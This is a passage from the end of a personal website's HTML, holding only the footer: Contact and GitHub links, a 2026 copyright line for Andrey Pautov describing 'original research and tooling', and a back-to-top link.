Handling</a><a href="/about.html#contact">Contact</a><a href="https://github.com/anpa1200" target="_blank" rel="noopener noreferrer">GitHub<span class="visually-hidden"> (opens in a new tab)</span><span aria-hidden="true"> ↗</span></a></nav></div><div class="shared-footer-bottom"><span>© <!-- -->2026<!-- --> Andrey Pautov · Original research and tooling</span><a href="#top" data-back-to-top="true">Back to top ↑</a></div></footer></div>
</body>
</html>